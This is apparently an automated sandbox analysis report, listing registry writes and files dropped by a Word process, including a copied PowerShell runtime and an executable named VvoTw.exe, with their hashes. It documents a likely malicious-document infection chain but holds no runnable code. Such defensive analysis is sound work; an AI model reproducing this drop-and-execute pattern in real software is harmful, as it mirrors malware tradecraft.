WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482635
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1324482611
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1324482612
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1324482611
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1324482612
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482636
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482637
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482638
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482639
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482640
2372
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482641
1784
VvoTw.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\71\52C64B7E
LanguageList
en-US

Files activity

Executable files
13
Suspicious files
0
Text files
123
Unknown types
3

Dropped files

PID
Process
Filename
Type
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll
executable
MD5: 54efe3c64894d8001451cfcadf9c0f3c
SHA256: 52fbddd19233ecc3f43ce229f6ea525c6775f435445e4811421195c40f8f569d
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\pwrshmsg.dll
executable
MD5: ce9fbe8ee03e772b49e0b269de5069a3
SHA256: bd674e836e28607103ca5801b8f6dbe662a8c35e0aaa5dbce3e57603845fb7b7
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll
executable
MD5: 348e5beda10b9d600f7d40cc3b9d8755
SHA256: 7c2d083520d74993f1aa90a193f599c7c9a7a7bd8cd00558d72cc0d24162f314
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\PSEvents.dll.mui
executable
MD5: a2972815d82bd444ab64263216d616b6
SHA256: 54573713758b342184f1f4cd8a2e9b08bac4db17a850962940c32c1afafc0d18
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\PSEvents.dll
executable
MD5: a3aec703e2d459b908ed4ca8c40c3e1a
SHA256: 89fdb476aa9973527816c9ddaf180c7d162dbd823b3690d03279221b07fef170
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\pwrshmsg.dll.mui
executable
MD5: 21826a427fba5149052782c243064ed8
SHA256: 17d235494bbe4ea840b5227b24af17d6a6d34a458f427f8227b3f53d79683ecd
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\powershell.exe.mui
executable
MD5: 49c5858f6511670eeac8d62ab5d5f4a1
SHA256: 7942dd782bc87a56db08cd89cc6d04a139cb12ad8d0dbf8ecd80862a5ceef56e
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\VvoTw.exe
executable
MD5: 852d67a27e454bd389fa7f02a8cbe23f
SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\pwrshsip.dll
executable
MD5: 1908ffadf1d45f0eeb0ffa541b677aeb
SHA256: 61acb031987c0b5e3295dc1331ad93f32e7127f5d5dd4f28f649cd3765208014
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\pspluginwkr.dll.mui
executable
MD5: fe0bac0cae9ad76c922a9b2cac3c757e
SHA256: f9b7639aaf79dd4b7fe97d8d47e46ce94ddc25a552c915596da656d71e985b7d
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\powershell_ise.exe
executable
MD5: 8e6390b20917929fb31679981b411557
SHA256: c7fd161906c7226e86c7ae00506a1c7862d21ed4bb3fef34a4b20c999a5a3e2a
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\pspluginwkr.dll
executable
MD5: 808aa87aa129df48ef94f8f9c58736ce
SHA256: a5d5d9f4adc81138f839d28d59f73f516cf937fcb5fbe2e4659185912874697b
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\powershell_ise.resources.dll
executable
MD5: 10700177263c5e9bc3b889c92614b2cc
SHA256: a6da710e1e959c021b9b62ccdc663e6b5d862e669556be923405e9a5e1be5f8e
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_remote_output.help.txt
text
MD5: 843c7694acdf81c35aada01240e4d43d
SHA256: 19ed68b6696a13bfb38b01f1f8a1ac41771ea319f345d31d2cfe76ad66d33c18
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\TroubleshootingPack\TroubleshootingPack.psd1
text
MD5: 896c9f3b45f00f7efc7328b60274b322
SHA256: 5da66875cb669a50b56eed98d43f03179f8fdf3b0b9062c79da167ce522f9d5c
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\TroubleshootingPack\en-US\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll-Help.xml
xml
MD5: 58949cb3dcfd589ae34d5751ea7921bd
SHA256: 57bdfcde06ab9a0a977652761658c6434a75ca8b1b4835af2a106b4c7725c85d
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\TroubleshootingPack\TroubleshootingPack.format.ps1xml
text
MD5: 059b2013069e42a394db5cb551e345b5
SHA256: 6dd7dded2fd500f185b4ed8b2dcdbbec1dda0625b6ac0006f4b3e92b7365f120
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\BitsTransfer\en-US\about_BITS_Cmdlets.help.txt
text
MD5: beeb534db71d0cb137206cd4c2d72aeb
SHA256: 6106d0dcad89f50dcbd255b910e959924a72eabc0c63679b0ac789bb5400ec23
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\PSDiagnostics\PSDiagnostics.psm1
text
MD5: e00e79e73582dab9229da82dee52b56f
SHA256: 35278dae074b56251d34c2bd0f0168bf1591083fcc0d9ee4f6a5fd70628645c3
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\powershell.exe
––
MD5:  ––
SHA256:  ––
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\System.Management.Automation.dll-Help.xml
xml
MD5: 2170b1c7496307c0949b54a6dd6f0a54
SHA256: 1168c8dd29c79e11aaaa17362f71969e0f9c3721a1c50c9800c32333f298c2a2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Help.format.ps1xml
xml
MD5: 915f654e42bbff58bb45e199695b9645
SHA256: f88172e876bbf54d22985a789648b393a4cf37fa5c100ef428aed21c3ffe2e41
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\AppLocker\AppLocker.psd1
text
MD5: 2b16aad4e01313f505f21af056730bfe
SHA256: d22787b0b60a2e44c3b80432321b3267f41c3f58ce7bc9080c471ef92e233918
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Examples\profile.ps1
text
MD5: 24b26c8dd3e9507390f320bb82feacff
SHA256: c91af52ebfc73ff82aefbbbefb4bb7526466c8ab7c903beb2f6996a63a54f0b4
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\BitsTransfer\BitsTransfer.Format.ps1xml
xml
MD5: df8df3a9150be3b665af838a81c1adf1
SHA256: bb1694a07d73474839a1ab44de15a16681ecc69003a1c447743b4866e7c1f5ac
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\AppLocker\en-US\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll-Help.xml
xml
MD5: af07b8b898e6d6e01ec6ecad383c5cd0
SHA256: 0ae6eff718f4d81b89e1bdf9acdc7ed4daac47742abf3f0e1efd924a75a28d6b
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\FileSystem.format.ps1xml
xml
MD5: 07b1a0ee828c0aea9957165342c9b0f2
SHA256: ee7c7ea3d313f74f27ae5ec832b9214d3a2731dd62ad3621b7c290119fad56e1
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\BitsTransfer\BitsTransfer.psd1
text
MD5: 2c0a6fcb3b6fa091a6dc2649d36249ad
SHA256: a96a2d3da8fc97138378658c8b106db6c4468f576d17878bac5a252b88a02ef7
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\getevent.types.ps1xml
xml
MD5: 8bce15f00bc8e60895ba37f6e3666145
SHA256: bd543ac559e7fee952c01b76bc0b2e2ba92b9b05fbf2b79f228b9a33aa376175
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\WSMan.Format.ps1xml
xml
MD5: 2a365431e43987daf2960f08a49f2679
SHA256: 7cbb42f77ca04293ecdbc69e2633b94725dd03307ca3637bd29fb2d94ed72022
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Modules\BitsTransfer\en-US\Microsoft.BackgroundIntelligentTransfer.Management.dll-Help.xml
xml
MD5: 3f3d8394d810834f7ee9c637fc6bde6b
SHA256: 27a67bc6d62fb41d111123fa5fb4a8c0f934d52cefd9afc98221e99cce41c39c
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\Registry.format.ps1xml
xml
MD5: ea3e8e9c9e266070d499b0e1a74a54ec
SHA256: de1626c8cd04b43ba157bdbdc548174ebb4d0ab27b0e966fb383150cc8a39f1c
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\PowerShellCore.format.ps1xml
xml
MD5: 7868501b2fb334345434ee864db28b81
SHA256: bce501aad2196f4c69f8ca4517a8424aa31e2863fb42de20eba4b689d6255f75
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\Microsoft.PowerShell.ConsoleHost.dll-Help.xml
xml
MD5: a8fc5b9411d34e7f76703299cefdc14b
SHA256: c8afa7c171b8e8c310a7eb86d27d04907ad060197e56f80e05d85c514cc03109
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\Microsoft.Wsman.Management.dll-Help.xml
xml
MD5: 7fea934a844f8c0a7900260324115571
SHA256: 5e3f986ea9b1ffa5d4245d78b378708af82a442d455f2c575aefd6c999428e71
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\types.ps1xml
xml
MD5: 2300a495192fe39d518e167dc5bae6a5
SHA256: 7ee8c9dd51818ce9c2b03442ef20594ba79e26b6b3af87fe08a4790a0c34bf7c
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\Microsoft.PowerShell.Commands.Utility.dll-Help.xml
xml
MD5: a9d465b5d2ef20ae266e70352300d640
SHA256: 9e8c2473303abf1e4410cfc9a72065f29524a04306f0dff0e44bc143e7002f34
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\Microsoft.PowerShell.Security.dll-Help.xml
xml
MD5: c25f7a8e570f8dbad4c416c109877660
SHA256: f886dd98b69382259a0f63c26b565af24a9368267ef60ee16ef49b00a7a66500
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\Microsoft.PowerShell.Commands.Management.dll-Help.xml
xml
MD5: dd69d8010bdfc984bf4afe463e0a5ce6
SHA256: 086b8c991bb8639e536e504456b24650a16b2e1a8eb7c55e7e0c92bc4fc9085c
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_WMI_Cmdlets.help.txt
text
MD5: cba26a7e65800101048204b291bccca0
SHA256: 97fc421761f23ad21f1ab0c6677e018fc8e3be94f9000f9ccb8f16afb5a53de7
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_WS-Management_Cmdlets.help.txt
text
MD5: 767cd05db429f751517300fae098b1e2
SHA256: f2e579fdc195265c5b1b4523e82ca78540e136fc618ffc01db8de443bb3b296d
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Windows_PowerShell_2.0.help.txt
text
MD5: d60451979004b7b169b159fecdc81adb
SHA256: 1f075d3c6e53f72aa7a991fed26a64aafe6ba687f233bcb3a342ab4d6726431f
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_type_operators.help.txt
text
MD5: a4918d1fefcd62645a968fea60fb8a43
SHA256: 288eed9b5e01a259f546da5a44e08e53240d416587461bbc4bdd1c9092975b7a
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\Microsoft.PowerShell.Commands.Diagnostics.dll-Help.xml
xml
MD5: 0ed4fc1248791de840904a2667532ea1
SHA256: 888ba7505afa707502ed8897e7a548fe2a7ed06e0aeb9b5d0e528a201e77be4a
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Variables.help.txt
text
MD5: 4323f3895923d9863b52bf077b3c4054
SHA256: 7a98e56b6249e1b60425857d1c733fbd2cce0bf5e0848ce17e711f860851a6d2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Windows_PowerShell_ISE.help.txt
text
MD5: 9733f911f9ffeabe830c78606c7595ce
SHA256: 4cc6d261a332c1bbd19d907e749ab2fe5dfc626fa3009130ad96ad7932973f44
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\ImportAllModules.psd1
text
MD5: 9e3c02c4befa85398de72b52dd39c29a
SHA256: b71e6e8b3bc606b072f7259f339710eb68bcc7f09a488b0eb9c5058afb156d4b
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_While.help.txt
text
MD5: c1492a84c53feb39651faf9c3dced879
SHA256: 74077aefd669655631d393c7d71648446bcd81fb974c96071786127cc690a4e3
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_types.ps1xml.help.txt
text
MD5: 56d4528792d5a6b440b94473ef182858
SHA256: 9bfb2a721d6eef54a9fb57c792351eee2ca7a8bf0cd0beefcf6f01ea184acc53
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\default.help.txt
text
MD5: e179134ddc1c768d862464d6e4a8511f
SHA256: 13b1d2c9eb465c94197b8e9d93cf72063b083f2964f3d835d1c1f8414a21f7a1
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_try_catch_finally.help.txt
text
MD5: f22634a9aac67ce9687113330547515a
SHA256: 92176d04ae1fdc1ba160d67e7af57065eecbf81cfdd3e499a446a0cec9ee1f86
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_wildcards.help.txt
text
MD5: 9d8c038c6f4abc57a9ce890367170169
SHA256: eba0d9e613186b60ffe3194ab3dd3e9f21f859526ab682029bf1a7026926c5b1
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Throw.help.txt
text
MD5: b8c5970eb2ff62a8853d8bb7818f3d7f
SHA256: 7a684d77cde10addf0ecfa506a0d20bc69c4395a33e2eb9565cdb3a721e12a84
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_split.help.txt
text
MD5: f043457ffa8368c9aa4abb83bbf184f3
SHA256: 93d2f8789590177a75ba5a642f4cd1e5a92a1a9e4eb44f18a870f8341ea178f2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_remote_jobs.help.txt
text
MD5: 2b9449d6f7bfab7adcbd7c2df999638d
SHA256: d20188c06d8abf31fb3f5d641ce0226a85063af8bb20046939b103562708b551
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_remote_troubleshooting.help.txt
text
MD5: 1bacdfd726f266e6e088224fe0b14b21
SHA256: 9beed907031ab92bcd7e43e17c93382ddcad378a2276f3e2f51008a5cbb04bdb
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_requires.help.txt
text
MD5: 889cbc7ac1d723e66f09ce61380b46e9
SHA256: 7b58fb203cb4faad3923b70e39e570fe95251fd893210427c883ff9ae4077112
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Return.help.txt
text
MD5: f9fa7df0fcc61cc286f0123e5dfce3c1
SHA256: 186300249a6de81a6ba1fddbfa6927dfcaebab0371ddfb180583126cd0b9c29a
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Switch.help.txt
text
MD5: 34647bcf99a3cda9b1420976da2193fd
SHA256: d3b4d8a1933470f997e062090a336c7d37769115e209aa27ffcd7ef1b2502f36
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_trap.help.txt
text
MD5: b17bdcc8e7414428f11bfce93eccd0a8
SHA256: 743d625f624819d64b274ce3811e35ff41c8c65dd4de3e27e76dcd57ea812e78
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_script_blocks.help.txt
text
MD5: 2358193b0f5f79220dfbc03d7a505ac2
SHA256: 8636be3b0ec4679b49e44d4309e453fc9039d60c065fbb5dc467cd20e1fadea2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_transactions.help.txt
text
MD5: 8615bd31d5ce19bbffc951892c0bb549
SHA256: 6fc67c20e69752bd2c729f9e63de09308811f96c7cfdbfecdad0b1c3882de269
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_remote_requirements.help.txt
text
MD5: c850cdb6e283b9194aa597d418412818
SHA256: 2b13987b0f7fa7ed66662bf4661f8f0f1f18778e9d78f9a869caa826c41de640
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_scripts.help.txt
text
MD5: 09f74326137427abc97c47918983e60a
SHA256: 13e8ac0907085c6b8f9ef11977533bfa0f76ef4e5f32b09a306836280d4cdaf8
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Signing.help.txt
text
MD5: 347d106a0b234e6f7c714fb5c5e1cebc
SHA256: 29e6144b13bdb4e4f6ee990a05ff88733b1331b96f993fef348eccf6689628be
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Special_Characters.help.txt
text
MD5: 6eec4c5e1607a434fef0f6c9807343c2
SHA256: df6ef01ccf0614ed74e9a469266691fc5dfb3e23b13871394734a5b4275e91c0
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_script_internationalization.help.txt
text
MD5: f103bba2417482e5be5cfb258ad26cc6
SHA256: c1cc99c069e49d5ea153ffcaf9e2dd82ac0d2718c04673430d02e8adbf1dea1d
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_scopes.help.txt
text
MD5: 696344c2f8c79c4cd76e9c61360817b4
SHA256: ba61159b055b683e5c4406342caaa557ac3c228c175a4f83b2bb1316dfb9dfd7
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Reserved_Words.help.txt
text
MD5: 65c8d0fe33ec0a8124aab2494d8ec82e
SHA256: 90fad4f20b37e7c86de11741eceb68337be1c52f5631678d79661431d3a1b3a2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\CVRACCD.tmp.cvr
––
MD5:  ––
SHA256:  ––
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Session_Configurations.help.txt
text
MD5: 8146b0eeb5cbc6f81fa7c5a594605619
SHA256: 2b598ae9c27625cf4e92bc87aaba0a7e19216adf1c3e00d28d792b526b569ee1
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_prompts.help.txt
text
MD5: 2052b9df9dd514258d12f9c28cd8b9fc
SHA256: eaf5f3bbb64fe197ee63deb95f9f643d9c7b3135358929f93819a92175def42a
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_preference_variables.help.txt
text
MD5: 14d287caa7b2c85b4e29fe9fd070fcea
SHA256: c740fdb99bd6aa8edddce9837d34e317ae7d6f2a7b8057b708d1b5a0f4332d0a
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_properties.help.txt
text
MD5: 33f20bf86e538531e63d438dd507d074
SHA256: 99ebbf2849ccdcbbdfc6d4d08a10ea17dfa61d7890a03107b531c00f0c38dfe2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_pssession_details.help.txt
text
MD5: 9d0cecf572ac565927552bd659773d81
SHA256: 2d3fb06dd2edf4172e3702d886015f491128ab7a5ae826760196c729888d7fff
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_profiles.help.txt
text
MD5: 8d5da8c76b0d1b7bb6008aadb11f3905
SHA256: ddb621ba8624aafeb28a33a57248f18368b3f1e5b999637d29253def23b8d6f5
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_pssessions.help.txt
text
MD5: 78fda14f35ae390f32afc9ba9766bb78
SHA256: d65ec7906a1bcb8187e8aab371880a0bb52b99ad89e66bd3843a38331ae85c81
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_remote_FAQ.help.txt
text
MD5: db3b55bf4ccb6088f30c5b7fd67ac967
SHA256: 40de3059b29a805278fd96e2b3b18595010180538da937606113f3bc76db1a4c
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Quoting_Rules.help.txt
text
MD5: 664fcfdfb16222061e1922a7e5faff48
SHA256: d3ff393ca9e7eac03b4100d13708df42ae4d9e87a960593d54a5c32e0f0e92ff
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Redirection.help.txt
text
MD5: 0f9f0cfef5ee3ec63edebf33b819b9b4
SHA256: eac4c83c40399c2293c757a2a9256beac8eeb7dbe0f0a2a828f361c6bcb82ce4
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_providers.help.txt
text
MD5: 48b2fc4920cae7bef7958f3236fda34f
SHA256: 41adbafa18c051880e4e487d56c8ef4bdbbf72f10e2823993596aff8481c7777
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_remote.help.txt
text
MD5: 69421c53ecc0e4ff792980ee25308582
SHA256: f02c47cd1b8a37cff1d6e54f15d1fc6f276f92497ec9e9d1f595698fb0c54144
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_pipelines.help.txt
text
MD5: ea96217fa09366fb2aa409c053b4d600
SHA256: 25b371904f2b56eeba166379041c68fb9372875f6accf6cef668d47c6a0d9a05
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_PSSnapins.help.txt
text
MD5: 74b82613f6a8d27e1c37e52137b91f6d
SHA256: 000e798faac3e5dc3686c386a0515ccd5c23f50f59b645fded1d6a9b7fd06c23
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Ref.help.txt
text
MD5: ea24480ed2044d9d5c0aafe278701d8a
SHA256: 10ff4b59cde544688d89ad07dc5e230658556ba187e2b378c8ae6a52752b0d69
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_regular_expressions.help.txt
text
MD5: 8cdb943f0be785d4ff09b767fa9aae72
SHA256: fa023b369ab994a58076ff6b973d783124ce13c69deb614d5980c7f6d92633c1
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Parsing.help.txt
text
MD5: 2209dcd8e1b1b3508404a93ae2b4dac2
SHA256: 5af6713ef8f416ef4bbd7c81fcb9caa1778ac4746ccab2eb1f7dcd254181cb08
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_methods.help.txt
text
MD5: 6b43c71a84500386d5f27defd6565fa2
SHA256: 4f4607cfe8019088da7343c65cdeccf20f3b143d88d75f0a1e0d3213cd134f8a
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_parameters.help.txt
text
MD5: bd7ea6bc90d01a0602f613da704da5bd
SHA256: 40ad4ed4d5c20a9c034adf54b8459b6f713b95ee9b9446310f9e01843722d3c0
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Path_Syntax.help.txt
text
MD5: ad60d27a0f5b7b6a9138c82a93b0928f
SHA256: 2c04701294f26e634297d7c0da90b8f68118444796757eba42ef4e088784af01
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_modules.help.txt
text
MD5: d5e0ab3b288a05cd5fc599e54b9be2d7
SHA256: 4896a7da09afa4ba971245023a1553616def5fe598eeb5d2c0a3576259f280f2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_jobs.help.txt
text
MD5: e820b3afc4b36f28adad78b40d6c5a2d
SHA256: 772d3fe1423995399601cc11f89b2e4d9609baaeb83120c3fb294566f16d079c
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_join.help.txt
text
MD5: 81f6388a6beae9dc1255d05fd2c8646a
SHA256: 6c94e68a780ba445066c3453ab1bb6d71216e32d44282bd3c6228a121f5cf9f3
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_Language_Keywords.help.txt
text
MD5: 0ad599ac4f7c8906c0d229788e96254a
SHA256: ce445ae30da19371d775e9e43882793927a2872654fe4c270578a698348bae90
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_locations.help.txt
text
MD5: dacf3b0d8819b5f706b94db45c0ee402
SHA256: 34aaaa4de11397215cb2778462bd0a4d6b2e58f7b560b6f52aff405d2ee92ab2
2372
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\yzqhly\odqkhnur\en-US\about_operators.help.txt
text
MD5: bba4d9d2698b576530f9337ccc056fc0
